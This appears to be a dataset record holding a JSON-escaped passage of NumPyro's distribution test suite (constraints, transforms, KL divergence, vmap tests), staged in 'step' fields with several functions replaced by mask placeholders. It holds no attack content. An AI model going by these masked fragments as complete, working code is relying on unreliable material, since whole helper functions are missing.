enumerate(params)]\n fn_lhs = fn(*args_lhs)\n fn_rhs = fn(*args_rhs)\n expected_grad = (fn_rhs - fn_lhs) / (2.0 * eps)\n assert jnp.shape(actual_grad) == jnp.shape(params[i])\n if i == 0 and jax_dist is dist.Delta:\n expected_grad = 0.0\n assert_allclose(jnp.sum(actual_grad), expected_grad, rtol=0.01,\n atol=0.01)\n\n\n<mask token>\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\[email protected]('prepend_shape', [(), (2,), (2, 3)])\ndef test_distribution_constraints(jax_dist, sp_dist, params, prepend_shape):\n if jax_dist in (_TruncatedNormal, _TruncatedCauchy, _GaussianMixture,\n _Gaussian2DMixture, _GeneralMixture, _General2DMixture):\n pytest.skip(f'{jax_dist.__name__} is a function, not a class')\n dist_args = [p for p in inspect.getfullargspec(jax_dist.__init__)[0][1:]]\n valid_params, oob_params = list(params), list(params)\n key = random.PRNGKey(1)\n dependent_constraint = False\n for i in range(len(params)):\n if jax_dist in (_ImproperWrapper, dist.LKJ, dist.LKJCholesky\n ) and dist_args[i] != 'concentration':\n continue\n if 'SineSkewed' in jax_dist.__name__ and dist_args[i] != 'skewness':\n continue\n if jax_dist is dist.EulerMaruyama and dist_args[i] != 't':\n continue\n if jax_dist is dist.TwoSidedTruncatedDistribution and dist_args[i\n ] == 'base_dist':\n continue\n if jax_dist is dist.GaussianRandomWalk and dist_args[i] == 'num_steps':\n continue\n if jax_dist is dist.SineBivariateVonMises and dist_args[i\n ] == 'weighted_correlation':\n continue\n if params[i] is None:\n oob_params[i] = None\n valid_params[i] = None\n continue\n constraint = jax_dist.arg_constraints[dist_args[i]]\n if isinstance(constraint, constraints._Dependent):\n dependent_constraint = True\n break\n key, key_gen = random.split(key)\n oob_params[i] = gen_values_outside_bounds(constraint, jnp.shape(\n 
params[i]), key_gen)\n valid_params[i] = gen_values_within_bounds(constraint, jnp.shape(\n params[i]), key_gen)\n if jax_dist is dist.MultivariateStudentT:\n valid_params[0] += 1\n if jax_dist is dist.LogUniform:\n valid_params[1] += valid_params[0]\n assert jax_dist(*oob_params)\n if not dependent_constraint and (jax_dist is not _ImproperWrapper and \n 'SineSkewed' not in jax_dist.__name__):\n with pytest.raises(ValueError):\n jax_dist(*oob_params, validate_args=True)\n with pytest.raises(ValueError):\n oob_params = jax.device_get(oob_params)\n\n def dist_gen_fn():\n d = jax_dist(*oob_params, validate_args=True)\n return d\n jax.jit(dist_gen_fn)()\n d = jax_dist(*valid_params, validate_args=True)\n if sp_dist and not _is_batched_multivariate(d) and not (d.event_shape and\n prepend_shape):\n valid_samples = gen_values_within_bounds(d.support, size=\n prepend_shape + d.batch_shape + d.event_shape)\n try:\n expected = sp_dist(*valid_params).logpdf(valid_samples)\n except AttributeError:\n expected = sp_dist(*valid_params).logpmf(valid_samples)\n assert_allclose(d.log_prob(valid_samples), expected, atol=1e-05,\n rtol=1e-05)\n oob_samples = gen_values_outside_bounds(d.support, size=prepend_shape +\n d.batch_shape + d.event_shape)\n with pytest.warns(UserWarning, match='Out-of-support'):\n d.log_prob(oob_samples)\n with pytest.warns(UserWarning, match='Out-of-support'):\n oob_samples = jax.device_get(oob_samples)\n valid_params = jax.device_get(valid_params)\n\n def log_prob_fn():\n d = jax_dist(*valid_params, validate_args=True)\n return d.log_prob(oob_samples)\n jax.jit(log_prob_fn)()\n\n\ndef test_omnistaging_invalid_param():\n\n def f(x):\n return dist.LogNormal(x, -np.ones(2), validate_args=True).log_prob(0)\n with pytest.raises(ValueError, match='got invalid'):\n jax.jit(f)(0)\n\n\ndef test_omnistaging_invalid_sample():\n\n def f(x):\n return dist.LogNormal(x, np.ones(2), validate_args=True).log_prob(-1)\n with pytest.warns(UserWarning, match='Out-of-support'):\n jax.jit(f)(0)\n\n\ndef test_categorical_log_prob_grad():\n data = jnp.repeat(jnp.arange(3), 10)\n\n def f(x):\n return dist.Categorical(jax.nn.softmax(x * jnp.arange(1, 4))).log_prob(\n data).sum()\n\n def g(x):\n return dist.Categorical(logits=x * jnp.arange(1, 4)).log_prob(data\n ).sum()\n x = 0.5\n fx, grad_fx = jax.value_and_grad(f)(x)\n gx, grad_gx = jax.value_and_grad(g)(x)\n assert_allclose(fx, gx, rtol=1e-06)\n assert_allclose(grad_fx, grad_gx, atol=0.0001)\n\n\ndef test_beta_proportion_invalid_mean():\n with dist.distribution.validation_enabled(), pytest.raises(ValueError,\n match='^BetaProportion distribution got invalid mean parameter\\\\.$'):\n dist.BetaProportion(1.0, 1.0)\n\n\n<mask token>\n\n\[email protected]('constraint', [constraints.corr_cholesky,\n constraints.corr_matrix, constraints.greater_than(2), constraints.\n interval(-3, 5), constraints.l1_ball, constraints.less_than(1),\n constraints.lower_cholesky, constraints.scaled_unit_lower_cholesky,\n constraints.ordered_vector, constraints.positive, constraints.\n positive_definite, constraints.positive_ordered_vector, constraints.\n real, constraints.real_vector, constraints.simplex, constraints.\n softplus_positive, constraints.softplus_lower_cholesky, constraints.\n unit_interval, constraints.open_interval(0.0, 1.0)], ids=lambda x: x.\n __class__)\[email protected]('shape', [(), (1,), (3,), (6,), (3, 1), (1, 3), (5,\n 3)])\ndef test_biject_to(constraint, shape):\n transform = biject_to(constraint)\n event_dim = transform.domain.event_dim\n if 
isinstance(constraint, constraints._Interval):\n assert transform.codomain.upper_bound == constraint.upper_bound\n assert transform.codomain.lower_bound == constraint.lower_bound\n elif isinstance(constraint, constraints._GreaterThan):\n assert transform.codomain.lower_bound == constraint.lower_bound\n elif isinstance(constraint, constraints._LessThan):\n assert transform.codomain.upper_bound == constraint.upper_bound\n if len(shape) < event_dim:\n return\n rng_key = random.PRNGKey(0)\n x = random.normal(rng_key, shape)\n y = transform(x)\n assert transform.forward_shape(x.shape) == y.shape\n assert transform.inverse_shape(y.shape) == x.shape\n x_nan = transform.inv(jnp.full(jnp.shape(y), np.nan))\n assert x_nan.shape == x.shape\n batch_shape = shape if event_dim == 0 else shape[:-1]\n assert_array_equal(transform.codomain(y), jnp.ones(batch_shape, dtype=\n jnp.bool_))\n z = transform.inv(y)\n assert_allclose(x, z, atol=1e-05, rtol=1e-05)\n assert_array_equal(transform.domain(z), jnp.ones(batch_shape))\n actual = transform.log_abs_det_jacobian(x, y)\n assert jnp.shape(actual) == batch_shape\n if len(shape) == event_dim:\n if constraint is constraints.simplex:\n expected = np.linalg.slogdet(jax.jacobian(transform)(x)[:-1, :])[1]\n inv_expected = np.linalg.slogdet(jax.jacobian(transform.inv)(y)\n [:, :-1])[1]\n elif constraint in [constraints.real_vector, constraints.\n ordered_vector, constraints.positive_ordered_vector,\n constraints.l1_ball]:\n expected = np.linalg.slogdet(jax.jacobian(transform)(x))[1]\n inv_expected = np.linalg.slogdet(jax.jacobian(transform.inv)(y))[1]\n elif constraint in [constraints.corr_cholesky, constraints.corr_matrix\n ]:\n vec_transform = lambda x: matrix_to_tril_vec(transform(x),\n diagonal=-1)\n y_tril = matrix_to_tril_vec(y, diagonal=-1)\n\n def inv_vec_transform(y):\n matrix = vec_to_tril_matrix(y, diagonal=-1)\n if constraint is constraints.corr_matrix:\n matrix = matrix + jnp.swapaxes(matrix, -2, -1\n ) + jnp.identity(matrix.shape[-1])\n return transform.inv(matrix)\n expected = np.linalg.slogdet(jax.jacobian(vec_transform)(x))[1]\n inv_expected = np.linalg.slogdet(jax.jacobian(inv_vec_transform\n )(y_tril))[1]\n elif constraint in [constraints.lower_cholesky, constraints.\n scaled_unit_lower_cholesky, constraints.positive_definite,\n constraints.softplus_lower_cholesky]:\n vec_transform = lambda x: matrix_to_tril_vec(transform(x))\n y_tril = matrix_to_tril_vec(y)\n\n def inv_vec_transform(y):\n matrix = vec_to_tril_matrix(y)\n if constraint is constraints.positive_definite:\n matrix = matrix + jnp.swapaxes(matrix, -2, -1) - jnp.diag(\n jnp.diag(matrix))\n return transform.inv(matrix)\n expected = np.linalg.slogdet(jax.jacobian(vec_transform)(x))[1]\n inv_expected = np.linalg.slogdet(jax.jacobian(inv_vec_transform\n )(y_tril))[1]\n else:\n expected = jnp.log(jnp.abs(grad(transform)(x)))\n inv_expected = jnp.log(jnp.abs(grad(transform.inv)(y)))\n assert_allclose(actual, expected, atol=1e-05, rtol=1e-05)\n assert_allclose(actual, -inv_expected, atol=1e-05, rtol=1e-05)\n\n\[email protected]('transform, event_shape', [(PermuteTransform(np.\n array([3, 0, 4, 1, 2])), (5,)), (PowerTransform(2.0), ()), (\n SoftplusTransform(), ()), (LowerCholeskyAffine(np.array([1.0, 2.0]), np\n .array([[0.6, 0.0], [1.5, 0.4]])), (2,)), (transforms.ComposeTransform(\n [biject_to(constraints.simplex), SimplexToOrderedTransform(0.0),\n biject_to(constraints.ordered_vector).inv]), (5,))])\[email protected]('batch_shape', [(), (1,), (3,), (6,), (3, 1), (1, \n 3), (5, 3)])\ndef 
test_bijective_transforms(transform, event_shape, batch_shape):\n shape = batch_shape + event_shape\n rng_key = random.PRNGKey(0)\n x = biject_to(transform.domain)(random.normal(rng_key, shape))\n y = transform(x)\n assert_array_equal(transform.codomain(y), jnp.ones(batch_shape))\n z = transform.inv(y)\n assert_allclose(x, z, atol=1e-06, rtol=0.0001)\n assert transform.inv.inv is transform\n assert transform.inv is transform.inv\n assert transform.domain is transform.inv.codomain\n assert transform.codomain is transform.inv.domain\n assert_array_equal(transform.domain(z), jnp.ones(batch_shape))\n actual = transform.log_abs_det_jacobian(x, y)\n assert_allclose(actual, -transform.inv.log_abs_det_jacobian(y, x))\n assert jnp.shape(actual) == batch_shape\n if len(shape) == transform.domain.event_dim:\n if len(event_shape) == 1:\n expected = np.linalg.slogdet(jax.jacobian(transform)(x))[1]\n inv_expected = np.linalg.slogdet(jax.jacobian(transform.inv)(y))[1]\n else:\n expected = jnp.log(jnp.abs(grad(transform)(x)))\n inv_expected = jnp.log(jnp.abs(grad(transform.inv)(y)))\n assert_allclose(actual, expected, atol=1e-06)\n assert_allclose(actual, -inv_expected, atol=1e-06)\n\n\n<mask token>\n\n\[email protected]('batch_shape', [(), (5,)])\ndef test_composed_transform_1(batch_shape):\n t1 = transforms.AffineTransform(0, 2)\n t2 = transforms.LowerCholeskyTransform()\n t = transforms.ComposeTransform([t1, t2, t2])\n assert t.domain.event_dim == 1\n assert t.codomain.event_dim == 3\n x = np.random.normal(size=batch_shape + (6,))\n y = t(x)\n log_det = t.log_abs_det_jacobian(x, y)\n assert log_det.shape == batch_shape\n z = t2(x * 2)\n expected_log_det = jnp.log(2) * 6 + t2.log_abs_det_jacobian(x * 2, z\n ) + t2.log_abs_det_jacobian(z, t2(z)).sum(-1)\n assert_allclose(log_det, expected_log_det)\n\n\[email protected]('batch_shape', [(), (5,)])\ndef test_simplex_to_order_transform(batch_shape):\n simplex = jnp.arange(5.0) / jnp.arange(5.0).sum()\n simplex = jnp.broadcast_to(simplex, batch_shape + simplex.shape)\n transform = SimplexToOrderedTransform()\n out = transform(simplex)\n assert out.shape == transform.forward_shape(simplex.shape)\n assert simplex.shape == transform.inverse_shape(out.shape)\n\n\n<mask token>\n\n\[email protected]('transformed_dist', [dist.TransformedDistribution(\n dist.Normal(np.array([2.0, 3.0]), 1.0), transforms.ExpTransform()),\n dist.TransformedDistribution(dist.Exponential(jnp.ones(2)), [transforms\n .PowerTransform(0.7), transforms.AffineTransform(0.0, jnp.ones(2) * 3)])])\ndef test_transformed_distribution_intermediates(transformed_dist):\n sample, intermediates = transformed_dist.sample_with_intermediates(random\n .PRNGKey(1))\n assert_allclose(transformed_dist.log_prob(sample, intermediates),\n transformed_dist.log_prob(sample))\n\n\n<mask token>\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS)\ndef test_generated_sample_distribution(jax_dist, sp_dist, params, N_sample=\n 100000, key=random.PRNGKey(11)):\n \"\"\"On samplers that we do not get directly from JAX, (e.g. 
we only get\n Gumbel(0,1) but also provide samplers for Gumbel(loc, scale)), also test\n agreement in the empirical distribution of generated samples between our\n samplers and those from SciPy.\n \"\"\"\n if jax_dist not in [dist.Gumbel]:\n pytest.skip(\n '{} sampling method taken from upstream, no need totest generated samples.'\n .format(jax_dist.__name__))\n jax_dist = jax_dist(*params)\n if sp_dist and not jax_dist.event_shape and not jax_dist.batch_shape:\n our_samples = jax_dist.sample(key, (N_sample,))\n ks_result = osp.kstest(our_samples, sp_dist(*params).cdf)\n assert ks_result.pvalue > 0.05\n\n\n<mask token>\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE)\[email protected]('prepend_shape', [(), (2, 3)])\[email protected]('sample_shape', [(), (4,)])\ndef test_expand(jax_dist, sp_dist, params, prepend_shape, sample_shape):\n jax_dist = jax_dist(*params)\n new_batch_shape = prepend_shape + jax_dist.batch_shape\n expanded_dist = jax_dist.expand(new_batch_shape)\n rng_key = random.PRNGKey(0)\n samples = expanded_dist.sample(rng_key, sample_shape)\n assert expanded_dist.batch_shape == new_batch_shape\n assert samples.shape == sample_shape + new_batch_shape + jax_dist.event_shape\n assert expanded_dist.log_prob(samples\n ).shape == sample_shape + new_batch_shape\n assert expanded_dist.expand((3,) + new_batch_shape).batch_shape == (3,\n ) + new_batch_shape\n if prepend_shape:\n with pytest.raises(ValueError, match=\n 'Cannot broadcast distribution of shape'):\n assert expanded_dist.expand((3,) + jax_dist.batch_shape)\n\n\n<mask token>\n\n\[email protected]('extra_event_dims,expand_shape', [(0, (4, 3, 2, 1)\n ), (0, (4, 3, 2, 2)), (1, (5, 4, 3, 2)), (2, (5, 4, 3))])\ndef test_expand_reshaped_distribution(extra_event_dims, expand_shape):\n loc = jnp.zeros((1, 6))\n scale_tril = jnp.eye(6)\n d = dist.MultivariateNormal(loc, scale_tril=scale_tril)\n full_shape = 4, 1, 1, 1, 6\n reshaped_dist = d.expand([4, 1, 1, 1]).to_event(extra_event_dims)\n cut = 4 - extra_event_dims\n batch_shape, event_shape = full_shape[:cut], full_shape[cut:]\n assert reshaped_dist.batch_shape == batch_shape\n assert reshaped_dist.event_shape == event_shape\n large = reshaped_dist.expand(expand_shape)\n assert large.batch_shape == expand_shape\n assert large.event_shape == event_shape\n with pytest.raises((RuntimeError, ValueError)):\n reshaped_dist.expand(expand_shape + (3,))\n with pytest.raises((RuntimeError, ValueError)):\n large.expand(expand_shape[1:])\n\n\n<mask token>\n\n\[email protected]('event_shape', [(), (4,), (2, 4)])\ndef test_mask_grad(event_shape):\n\n def f(x, data):\n base_dist = dist.Beta(jnp.exp(x), jnp.ones(event_shape)).to_event()\n mask = jnp.all(jnp.isfinite(data), tuple(-i - 1 for i in range(len(\n event_shape))))\n log_prob = base_dist.mask(mask).log_prob(data)\n assert log_prob.shape == data.shape[:len(data.shape) - len(event_shape)\n ]\n return log_prob.sum()\n data = np.array([[0.4, np.nan, 0.2, np.nan], [0.5, 0.5, 0.5, 0.5]])\n log_prob, grad = jax.value_and_grad(f)(1.0, data)\n assert jnp.isfinite(grad) and jnp.isfinite(log_prob)\n\n\n<mask token>\n\n\ndef test_expand_no_unnecessary_batch_shape_expansion():\n for arg in (jnp.array(1.0), jnp.ones((2,)), jnp.ones((2, 2))):\n d = dist.Normal(arg, arg).expand([10, 3, *arg.shape])\n roundtripped_d = type(d).tree_unflatten(*d.tree_flatten()[::-1])\n assert d.batch_shape == roundtripped_d.batch_shape\n assert d.base_dist.batch_shape == roundtripped_d.base_dist.batch_shape\n assert d.base_dist.event_shape == 
roundtripped_d.base_dist.event_shape\n assert jnp.allclose(d.base_dist.loc, roundtripped_d.base_dist.loc)\n assert jnp.allclose(d.base_dist.scale, roundtripped_d.base_dist.scale)\n\n def bs(arg):\n return dist.Normal(arg, arg).expand([10, 3, *arg.shape])\n d = bs(arg)\n dj = jax.jit(bs)(arg)\n assert isinstance(d, dist.ExpandedDistribution)\n assert isinstance(dj, dist.ExpandedDistribution)\n assert d.batch_shape == dj.batch_shape\n assert d.base_dist.batch_shape == dj.base_dist.batch_shape\n assert d.base_dist.event_shape == dj.base_dist.event_shape\n assert jnp.allclose(d.base_dist.loc, dj.base_dist.loc)\n assert jnp.allclose(d.base_dist.scale, dj.base_dist.scale)\n\n\[email protected]('batch_shape', [(), (4,), (2, 3)], ids=str)\ndef test_kl_delta_normal_shape(batch_shape):\n v = np.random.normal(size=batch_shape)\n loc = np.random.normal(size=batch_shape)\n scale = np.exp(np.random.normal(size=batch_shape))\n p = dist.Delta(v)\n q = dist.Normal(loc, scale)\n assert kl_divergence(p, q).shape == batch_shape\n\n\ndef test_kl_delta_normal():\n v = np.random.normal()\n loc = np.random.normal()\n scale = np.exp(np.random.normal())\n p = dist.Delta(v, 10.0)\n q = dist.Normal(loc, scale)\n assert_allclose(kl_divergence(p, q), 10.0 - q.log_prob(v))\n\n\[email protected]('batch_shape', [(), (4,), (2, 3)], ids=str)\[email protected]('event_shape', [(), (4,), (2, 3)], ids=str)\ndef test_kl_independent_normal(batch_shape, event_shape):\n shape = batch_shape + event_shape\n p = dist.Normal(np.random.normal(size=shape), np.exp(np.random.normal(\n size=shape)))\n q = dist.Normal(np.random.normal(size=shape), np.exp(np.random.normal(\n size=shape)))\n actual = kl_divergence(dist.Independent(p, len(event_shape)), dist.\n Independent(q, len(event_shape)))\n expected = sum_rightmost(kl_divergence(p, q), len(event_shape))\n assert_allclose(actual, expected)\n\n\[email protected]('batch_shape', [(), (4,), (2, 3)], ids=str)\[email protected]('event_shape', [(), (4,), (2, 3)], ids=str)\ndef test_kl_expanded_normal(batch_shape, event_shape):\n shape = batch_shape + event_shape\n p = dist.Normal(np.random.normal(), np.exp(np.random.normal())).expand(\n shape)\n q = dist.Normal(np.random.normal(), np.exp(np.random.normal())).expand(\n shape)\n actual = kl_divergence(dist.Independent(p, len(event_shape)), dist.\n Independent(q, len(event_shape)))\n expected = sum_rightmost(kl_divergence(p, q), len(event_shape))\n assert_allclose(actual, expected)\n\n\[email protected]('shape', [(), (4,), (2, 3)], ids=str)\[email protected]('p_dist, q_dist', [(dist.Beta, dist.Beta), (dist.\n Gamma, dist.Gamma), (dist.Kumaraswamy, dist.Beta), (dist.Normal, dist.\n Normal), (dist.Weibull, dist.Gamma)])\ndef test_kl_univariate(shape, p_dist, q_dist):\n\n def make_dist(dist_class):\n params = {}\n for k, c in dist_class.arg_constraints.items():\n if c is constraints.real:\n params[k] = np.random.normal(size=shape)\n elif c is constraints.positive:\n params[k] = np.exp(np.random.normal(size=shape))\n else:\n raise ValueError(f'Missing pattern for param {k}.')\n d = dist_class(**params)\n if dist_class is dist.Kumaraswamy:\n d.KL_KUMARASWAMY_BETA_TAYLOR_ORDER = 1000\n return d\n p = make_dist(p_dist)\n q = make_dist(q_dist)\n actual = kl_divergence(p, q)\n x = p.sample(random.PRNGKey(0), (10000,)).copy()\n expected = jnp.mean(p.log_prob(x) - q.log_prob(x), 0)\n assert_allclose(actual, expected, rtol=0.05)\n\n\[email protected]('shape', [(4,), (2, 3)], ids=str)\ndef test_kl_dirichlet_dirichlet(shape):\n p = 
dist.Dirichlet(np.exp(np.random.normal(size=shape)))\n q = dist.Dirichlet(np.exp(np.random.normal(size=shape)))\n actual = kl_divergence(p, q)\n x = p.sample(random.PRNGKey(0), (10000,)).copy()\n expected = jnp.mean(p.log_prob(x) - q.log_prob(x), 0)\n assert_allclose(actual, expected, rtol=0.05)\n\n\ndef test_vmapped_binomial_p0():\n\n def sample_binomial_withp0(key):\n n = 2 * (random.uniform(key) > 0.5)\n _, key = random.split(key)\n return dist.Binomial(total_count=n, probs=0).sample(key)\n jax.vmap(sample_binomial_withp0)(random.split(random.PRNGKey(0), 1))\n\n\n<mask token>\n\n\ndef _tree_equal(t1, t2):\n t = jax.tree_util.tree_map(_allclose_or_equal, t1, t2)\n return jnp.all(jax.flatten_util.ravel_pytree(t)[0])\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\ndef test_vmap_dist(jax_dist, sp_dist, params):\n param_names = list(inspect.signature(jax_dist).parameters.keys())\n vmappable_param_idxs = _get_vmappable_dist_init_params(jax_dist)\n vmappable_param_idxs = vmappable_param_idxs[:len(params)]\n if len(vmappable_param_idxs) == 0:\n return\n\n def make_jax_dist(*params):\n return jax_dist(*params)\n\n def sample(d: dist.Distribution):\n return d.sample(random.PRNGKey(0))\n d = make_jax_dist(*params)\n if isinstance(d, _SparseCAR) and d.is_sparse:\n return\n in_out_axes_cases = [(tuple(0 if i in vmappable_param_idxs else None for\n i in range(len(params))), 0), *(([(0 if i == idx else None) for i in\n range(len(params))], 0) for idx in vmappable_param_idxs if params[\n idx] is not None), *(([(0 if i == idx else None) for i in range(len\n (params))], vmap_over(d, **{param_names[idx]: 0})) for idx in\n vmappable_param_idxs if params[idx] is not None), *(([(1 if i ==\n idx else None) for i in range(len(params))], vmap_over(d, **{\n param_names[idx]: 1})) for idx in vmappable_param_idxs if \n isinstance(params[idx], jnp.ndarray) and jnp.array(params[idx]).\n ndim > 0 and jax_dist is not _GeneralMixture)]\n for in_axes, out_axes in in_out_axes_cases:\n batched_params = [(jax.tree_map(lambda x: jnp.expand_dims(x, ax),\n arg) if isinstance(ax, int) else arg) for arg, ax in zip(params,\n in_axes)]\n d = make_jax_dist(*params)\n batched_d = jax.vmap(make_jax_dist, in_axes=in_axes, out_axes=out_axes\n )(*batched_params)\n eq = vmap(lambda x, y: _tree_equal(x, y), in_axes=(out_axes, None))(\n batched_d, d)\n assert eq == jnp.array([True])\n samples_dist = sample(d)\n samples_batched_dist = jax.vmap(sample, in_axes=(out_axes,))(batched_d)\n assert samples_batched_dist.shape == (1, *samples_dist.shape)\n\n\ndef test_multinomial_abstract_total_count():\n probs = jnp.array([0.2, 0.5, 0.3])\n key = random.PRNGKey(0)\n\n def f(x):\n total_count = x.sum(-1)\n return dist.Multinomial(total_count, probs=probs, total_count_max=10\n ).sample(key)\n x = dist.Multinomial(10, probs).sample(key)\n y = jax.jit(f)(x)\n assert_allclose(x, y, rtol=1e-06)\n\n\ndef test_normal_log_cdf():\n loc = jnp.array([[0.0, -10.0, 20.0]])\n scale = jnp.array([[1, 5, 7]])\n values = jnp.linspace(-5, 5, 100).reshape(-1, 1)\n numpyro_log_cdf = dist.Normal(loc=loc, scale=scale).log_cdf(values)\n numpyro_cdf = dist.Normal(loc=loc, scale=scale).cdf(values)\n jax_log_cdf = jax_norm.logcdf(loc=loc, scale=scale, x=values)\n assert_allclose(numpyro_log_cdf, jax_log_cdf)\n assert_allclose(jnp.exp(numpyro_log_cdf), numpyro_cdf, rtol=1e-06)\n\n\[email protected]('value', [-15.0, jnp.array([[-15.0], [-10.0], [-\n 5.0]]), jnp.array([[[-15.0], [-10.0], [-5.0]], [[-14.0], [-9.0], [-4.0]]])]\n )\ndef 
test_truncated_normal_log_prob_in_tail(value):\n loc = 1.35\n scale = jnp.geomspace(0.01, 1, 10)\n low, high = -20, -1.0\n a, b = (low - loc) / scale, (high - loc) / scale\n numpyro_log_prob = dist.TruncatedNormal(loc, scale, low=low, high=high\n ).log_prob(value)\n jax_log_prob = jax_truncnorm.logpdf(value, loc=loc, scale=scale, a=a, b=b)\n assert_allclose(numpyro_log_prob, jax_log_prob, rtol=1e-06)\n\n\ndef test_sample_truncated_normal_in_tail():\n tail_dist = dist.TruncatedNormal(loc=0, scale=1, low=-16, high=-15)\n samples = tail_dist.sample(random.PRNGKey(0), sample_shape=(10000,))\n assert ~jnp.isinf(samples).any()\n\n\[email protected]_custom_prng()\ndef test_jax_custom_prng():\n samples = dist.Normal(0, 5).sample(random.PRNGKey(0), sample_shape=(1000,))\n assert ~jnp.isinf(samples).any()\n",
"step-3": "<mask token>\n\n\ndef my_kron(A, B):\n D = A[..., :, None, :, None] * B[..., None, :, None, :]\n ds = D.shape\n newshape = *ds[:-4], ds[-4] * ds[-3], ds[-2] * ds[-1]\n return D.reshape(newshape)\n\n\ndef _identity(x):\n return x\n\n\n<mask token>\n\n\ndef sde_fn1(x, _):\n lam = 0.1\n sigma2 = 0.1\n return lam * x, sigma2\n\n\n<mask token>\n\n\nclass T(namedtuple('TestCase', ['jax_dist', 'sp_dist', 'params'])):\n\n def __new__(cls, jax_dist, *params):\n sp_dist = get_sp_dist(jax_dist)\n return super(cls, T).__new__(cls, jax_dist, sp_dist, params)\n\n\ndef _mvn_to_scipy(loc, cov, prec, tril):\n jax_dist = dist.MultivariateNormal(loc, cov, prec, tril)\n mean = jax_dist.mean\n cov = jax_dist.covariance_matrix\n return osp.multivariate_normal(mean=mean, cov=cov)\n\n\ndef _multivariate_t_to_scipy(df, loc, tril):\n if scipy.__version__ < '1.6.0':\n pytest.skip(\n 'Multivariate Student-T distribution is not available in scipy < 1.6'\n )\n jax_dist = dist.MultivariateStudentT(df, loc, tril)\n mean = jax_dist.mean\n cov = jax_dist.covariance_matrix\n return osp.multivariate_t(loc=mean, shape=cov, df=df)\n\n\ndef _lowrank_mvn_to_scipy(loc, cov_fac, cov_diag):\n jax_dist = dist.LowRankMultivariateNormal(loc, cov_fac, cov_diag)\n mean = jax_dist.mean\n cov = jax_dist.covariance_matrix\n return osp.multivariate_normal(mean=mean, cov=cov)\n\n\n<mask token>\n\n\ndef _TruncatedNormal(loc, scale, low, high):\n return dist.TruncatedNormal(loc=loc, scale=scale, low=low, high=high)\n\n\ndef _TruncatedCauchy(loc, scale, low, high):\n return dist.TruncatedCauchy(loc=loc, scale=scale, low=low, high=high)\n\n\n<mask token>\n\n\nclass SineSkewedUniform(dist.SineSkewed):\n\n def __init__(self, skewness, **kwargs):\n lower, upper = np.array([-math.pi, -math.pi]), np.array([math.pi,\n math.pi])\n base_dist = dist.Uniform(lower, upper, **kwargs).to_event(lower.ndim)\n super().__init__(base_dist, skewness, **kwargs)\n\n\n@vmap_over.register\ndef _vmap_over_sine_skewed_uniform(self: SineSkewedUniform, skewness=None):\n return vmap_over.dispatch(dist.SineSkewed)(self, base_dist=None,\n skewness=skewness)\n\n\nclass SineSkewedVonMises(dist.SineSkewed):\n\n def __init__(self, skewness, **kwargs):\n von_loc, von_conc = np.array([0.0]), np.array([1.0])\n base_dist = dist.VonMises(von_loc, von_conc, **kwargs).to_event(von_loc\n .ndim)\n super().__init__(base_dist, skewness, **kwargs)\n\n\n<mask token>\n\n\nclass SineSkewedVonMisesBatched(dist.SineSkewed):\n\n def __init__(self, skewness, **kwargs):\n von_loc, von_conc = np.array([0.0, -1.234]), np.array([1.0, 10.0])\n base_dist = dist.VonMises(von_loc, von_conc, **kwargs).to_event(von_loc\n .ndim)\n super().__init__(base_dist, skewness, **kwargs)\n\n\n@vmap_over.register\ndef _vmap_over_sine_skewed_von_mises_batched(self:\n SineSkewedVonMisesBatched, skewness=None):\n return vmap_over.dispatch(dist.SineSkewed)(self, base_dist=None,\n skewness=skewness)\n\n\nclass _GaussianMixture(dist.MixtureSameFamily):\n arg_constraints = {}\n reparametrized_params = []\n\n def __init__(self, mixing_probs, loc, scale):\n component_dist = dist.Normal(loc=loc, scale=scale)\n mixing_distribution = dist.Categorical(probs=mixing_probs)\n super().__init__(mixing_distribution=mixing_distribution,\n component_distribution=component_dist)\n\n @property\n def loc(self):\n return self.component_distribution.loc\n\n @property\n def scale(self):\n return self.component_distribution.scale\n\n\n@vmap_over.register\ndef _vmap_over_gaussian_mixture(self: _GaussianMixture, loc=None, scale=None):\n 
component_distribution = vmap_over(self.component_distribution, loc=loc,\n scale=scale)\n return vmap_over.dispatch(dist.MixtureSameFamily)(self,\n _component_distribution=component_distribution)\n\n\nclass _Gaussian2DMixture(dist.MixtureSameFamily):\n arg_constraints = {}\n reparametrized_params = []\n\n def __init__(self, mixing_probs, loc, covariance_matrix):\n component_dist = dist.MultivariateNormal(loc=loc, covariance_matrix\n =covariance_matrix)\n mixing_distribution = dist.Categorical(probs=mixing_probs)\n super().__init__(mixing_distribution=mixing_distribution,\n component_distribution=component_dist)\n\n @property\n def loc(self):\n return self.component_distribution.loc\n\n @property\n def covariance_matrix(self):\n return self.component_distribution.covariance_matrix\n\n\n@vmap_over.register\ndef _vmap_over_gaussian_2d_mixture(self: _Gaussian2DMixture, loc=None):\n component_distribution = vmap_over(self.component_distribution, loc=loc)\n return vmap_over.dispatch(dist.MixtureSameFamily)(self,\n _component_distribution=component_distribution)\n\n\nclass _GeneralMixture(dist.MixtureGeneral):\n arg_constraints = {}\n reparametrized_params = []\n\n def __init__(self, mixing_probs, locs, scales):\n component_dists = [dist.Normal(loc=loc_, scale=scale_) for loc_,\n scale_ in zip(locs, scales)]\n mixing_distribution = dist.Categorical(probs=mixing_probs)\n return super().__init__(mixing_distribution=mixing_distribution,\n component_distributions=component_dists)\n\n @property\n def locs(self):\n return self.component_distributions[0].loc\n\n @property\n def scales(self):\n return self.component_distributions[0].scale\n\n\n@vmap_over.register\ndef _vmap_over_general_mixture(self: _GeneralMixture, locs=None, scales=None):\n component_distributions = [vmap_over(d, loc=locs, scale=scales) for d in\n self.component_distributions]\n return vmap_over.dispatch(dist.MixtureGeneral)(self,\n _component_distributions=component_distributions)\n\n\nclass _General2DMixture(dist.MixtureGeneral):\n arg_constraints = {}\n reparametrized_params = []\n\n def __init__(self, mixing_probs, locs, covariance_matrices):\n component_dists = [dist.MultivariateNormal(loc=loc_,\n covariance_matrix=covariance_matrix) for loc_,\n covariance_matrix in zip(locs, covariance_matrices)]\n mixing_distribution = dist.Categorical(probs=mixing_probs)\n return super().__init__(mixing_distribution=mixing_distribution,\n component_distributions=component_dists)\n\n @property\n def locs(self):\n return self.component_distributions[0].loc\n\n @property\n def covariance_matrices(self):\n return self.component_distributions[0].covariance_matrix\n\n\n@vmap_over.register\ndef _vmap_over_general_2d_mixture(self: _General2DMixture, locs=None):\n component_distributions = 